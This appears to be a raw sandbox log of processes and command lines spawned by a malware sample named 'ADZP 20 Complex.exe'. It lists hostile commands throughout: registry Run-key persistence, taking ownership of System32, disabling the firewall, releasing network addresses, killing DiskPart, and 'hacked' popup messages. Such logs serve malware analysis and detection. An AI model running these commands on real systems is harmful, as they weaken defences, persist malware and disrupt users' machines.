attrib -r -a -s -h *.*
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\SysWOW64\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6220.tmp\6221.tmp\6222.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\SysWOW64\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /release
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\73A4.tmp\73B5.tmp\73B6.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\SysWOW64\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\SysWOW64\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B9E5.tmp\B9E6.tmp\B9E7.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BACF.tmp\BAD0.tmp\BAD1.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BF26.tmp\BF26.tmp\BF27.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BF25.tmp\BF26.tmp\BF27.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\CD1F.tmp\CD20.tmp\CD21.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\EAD8.tmp\EAD9.tmp\EADA.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\calc.exe
calc
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F9AD.tmp\F9BE.tmp\F9BF.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\notepad.exe
notepad
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\calc.exe
calc
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1582.tmp\1583.tmp\1584.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\notepad.exe
notepad
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\calc.exe
calc
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\303E.tmp\30EB.tmp\30EC.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\385C.tmp\385D.tmp\385E.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\SysWOW64\WScript.exe
